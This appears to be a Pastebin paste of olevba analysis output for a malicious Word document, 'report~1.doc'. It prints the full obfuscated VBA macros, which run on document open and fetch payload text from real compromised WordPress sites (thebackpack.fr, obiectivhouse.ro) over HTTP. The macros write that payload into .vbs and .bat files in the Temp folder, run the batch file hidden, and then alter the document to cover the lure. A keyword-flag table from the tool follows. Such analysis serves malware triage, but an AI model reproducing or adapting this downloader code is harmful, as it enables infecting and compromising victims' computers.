Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.31 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB-V report~1.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
- ===============================================================================
- FILE: report~1.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: report~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Auto_Open()
- Kuricknms
- End Sub
- Sub Kuricknms()
- QJKHWDJKASD = "qjwhekj 12 gejhhkasjdh kg12hjdg ahjsgd"
- Subkaka
- End Sub
- Sub AutoOpen()
- Kuricknms
- End Sub
- Sub Subkaka()
- Dim NJKAWD As String, OOODJWD As String, SSPCKDSD As String
- Dim TSTS As String, CDDD As String, LNSS As String, STT1 As String, STT2 As String
- Dim PBIn As String, KnsdD As Date, CONT As String
- Dim Ndjs As Integer
- Dim ABTH As String, BBTH As String
- Dim klmn As Integer, TTKK As String
- Dim GEFORCE1 As String, GEFORCE2 As String, hdjshd As Integer
- KnsdD = #2/12/2010#
- SSPCKDSD = spb(90 + 0 + 2)
- NJKAWD = Samsung(9898)
- OOODJWD = "Temp"
- PH2 = Module1.Jkjdnda(OOODJWD) + SSPCKDSD
- ART = 315
- BFT = 316
- Randomize
- Ndjs = Int(Year(KnsdD)) - 1906
- ATTH = hhr(Ndjs) + Chr(Ndjs + 12) + Chr(Ndjs + 12) + spb(8 + Ndjs)
- ATTH = ATTH + "://"
- TSTS = ".tx" + "t"
- CDDD = "66836487162" + TSTS
- LNSS = "sasa" + TSTS
- STT1 = "site/"
- STT1 = "thebackpack.fr/w" + "p-content/themes/salient/wpbakery/js_composer/assets/lib/prettyphoto/images/prettyPhoto/light_rounded/"
- STT2 = "obiectivhouse.ro/w" + "p-content/plugins/maintenance/load/images/fonts-icon/"
- PBIn = ATTH + STT1 + CDDD
- CONT = Module2.Huqwhdkjqwl(PBIn)
- BHJD = Right(CONT, 15)
- hdjshd = InStr(1, BHJD, "exit")
- If (hdjshd = 0) Then
- NJKQWD = ""
- PBIn = ATTH + NJKQWD + CDDD
- CONT = Module2.Huqwhdkjqwl(PBIn)
- NFBH = Module2.Huqwhdkjqwl(ATTH + NJKQWD + LNSS)
- Else
- NFBH = Module2.Huqwhdkjqwl(ATTH + STT1 + LNSS)
- End If
- Module2.Crispy (1)
- CPLRP1 = "pioneer"
- CPLRP2 = "paytina"
- CPLRP3 = "cr" & "anberry"
- CONT = Replace(CONT, CPLRP1, PH2, 1)
- CONT = Replace(CONT, CPLRP2, NFBH, 1)
- CONT2 = Replace(CONT, CPLRP3, NJKAWD, 1)
- TTKK = "$"
- klmn = CInt(Len(CONT2))
- For i = 1 To klmn
- If (Mid(CONT2, i, 1) = TTKK) Then
- If (Mid(CONT2, i - 1, 1) = TTKK) Then
- GEFORCE1 = Mid(CONT2, 1, i - 2)
- GEFORCE2 = Mid(CONT2, i + 1, klmn - i)
- End If
- End If
- Next i
- HQUJD = ".v"
- ABTH = PH2 + NJKAWD & HQUJD + "bs"
- BBTH = PH2 + NJKAWD + ".bat"
- Open ABTH For Output As #ART
- Print #ART, GEFORCE1
- Close #ART
- Module2.Crispy (1)
- Open BBTH For Output As #BFT
- Print #BFT, GEFORCE2
- Close #BFT
- Module2.Crispy (1)
- QUHDQ = Module2.Fuflmdjoo(BBTH)
- Module1.Hameleon
- End Sub
- Sub Workbook_Open()
- JHQDJBASND = "asdbj ashdksajhdjksa"
- Kuricknms
- End Sub
- Public Function NHdjhasbdhas(a As Object)
- NHdjhasbdhas = (a.responsetext)
- End Function
- Public Function Samsung(a As Integer)
- Randomize
- Samsung = CStr(Int((a / 2 * Rnd) + a))
- End Function
- Public Function Creasqwdqwjdk(a As String)
- Creasqwdqwjdk = CreateObject(a)
- End Function
- Public Function spb(sps As Integer)
- spb = Chr(sps)
- End Function
- Public Function Stkjrhbs(a As Integer)
- Stkjrhbs = Sgn(a)
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: report~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Hameleon()
- Dim ij As Integer
- Dim charCount As Integer
- charCount = ActiveDocument.Characters.Count - 1
- QJKDD = "k"
- QJHWDSAD = "qwdhjqwk dhkjd d"
- JFQW = "t"
- ij = 0
- Do While True
- ij = ij + 1
- If (ActiveDocument.Characters(ij) = QJKDD) Then
- MBASNMDBW = "qwmdh njh1jaskjhdk h1klh adjks"
- If (ActiveDocument.Characters(ij - 1) = JFQW) Then
- ActiveDocument.Range(Start:=0, End:=ij).Delete
- ActiveDocument.Range(Start:=0, End:=charCount - ij - 1).Font.ColorIndex = wdBlack
- Exit Do
- End If
- End If
- If (ij = charCount) Then
- Exit Do
- End If
- Loop
- End Sub
- Public Function Jkjdnda(sps As String)
- JKQHWDS = "wq,mnd,mn1djlkasjd kljddk12jdkl j"
- Jkjdnda = Environ(sps)
- End Function
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: report~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Kakarumba(n As Integer)
- Dim i As Integer
- Dim hduw As Integer
- For i = 1 To n Step 1
- Randomize
- hduw = Rnd
- Kakarumba = Kakarumba + hhr(Int(121 * hduw) + 90 + 7)
- Next i
- XQKLJDHJQ = "qwdkh2 k1hdlkjk21 dhjgasd"
- End Function
- Public Function Fuflmdjoo(a As String)
- Dim bydd As Variant
- bydd = Shell(a, 0)
- BJQHBDADS = "asdhjk qdhjqkwhdk qwhdlkj dkhasd"
- End Function
- Public Function Huqwhdkjqwl(nbqjbdjqw As String)
- Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, NNNMMHWDKJHAJSdsajgdh As Object, BHJQGWD As String
- Dim jahsghjJkhsd As String, dddc As Integer, QYDGGJASSSS As String, AsaHuhqdjhasd As String, hqudhhajs As String, AAHQJD As String
- AsaHuhqdjhasd = nbqjbdjqw
- JKAHJKSD = AsaHuhqdjhasd
- jahsghjJkhsd = AsaHuhqdjhasd
- 'asdhjsak dgashjdg as
- JQHWD = Chr(Round(4.55, 1) + 0.4 + 72)
- HQUD = JQHWD + "L2.S"
- Dim hquwd As Date, ajsid As Integer
- hquwd = #5/10/2011#
- ajsid = Int(Month(hquwd))
- Randomize
- BHJQWD = klmn(68 + Int(Month(DateAdd("m", 1, "6/3/06"))))
- dddc = 4 - ajsid
- HQDUQ = hhr(Val(81 + dddc))
- hqudhhajs = klmn(Val(78 + dddc))
- BHQDHJWQDW = HQUD + "erver" + "XML" + BHJQWD
- BYGDWHQGWHDWQ = BHQDHJWQDW + "TT" + HQDUQ
- 'akjshdj ashdk sd
- 'asdhkajks dhajsgd
- QYDGGJASSSS = "E"
- NNNHDQYUWG = hhr(11 * 2 * 4 + 4 * dddc)
- QYDGGJASSSS = hhr(71) + QYDGGJASSSS & NNNHDQYUWG
- DWQJDIQWDKWQJDHBB = hqudhhajs + "SX" + BYGDWHQGWHDWQ
- 'asdhgajs gdhajsg dsa
- 'asdhgajs gdhajsg dsa
- Set NNNMMHWDKJHAJSdsajgdh = CreateObject(DWQJDIQWDKWQJDHBB)
- 'anbdqmnbdqw bdnmq dqw
- NNNMMHWDKJHAJSdsajgdh.Open QYDGGJASSSS, jahsghjJkhsd
- NNNMMHWDKJHAJSdsajgdh.Send (BHJQGWD)
- AAHQJD = ThisDocument.NHdjhasbdhas(NNNMMHWDKJHAJSdsajgdh)
- Huqwhdkjqwl = AAHQJD
- End Function
- Sub Crispy(NSee As Long)
- Dim NnSke As Long
- NnSke = Timer + NSee
- Do While Timer < NnSke
- DoEvents
- Loop
- QJKHWD = "asdjhjk qhdjq kwdh hd "
- End Sub
- Public Function klmn(pag As Integer)
- klmn = Chr(pag)
- End Function
- Public Function hhr(sps As Integer)
- hhr = Chr(sps)
- End Function
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Environ | May read system environment variables |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Lib | May run code from a DLL (obfuscation: |
- | | | VBA expression) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- | Suspicious | VBA obfuscated | VBA string expressions were detected, |
- | | Strings | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement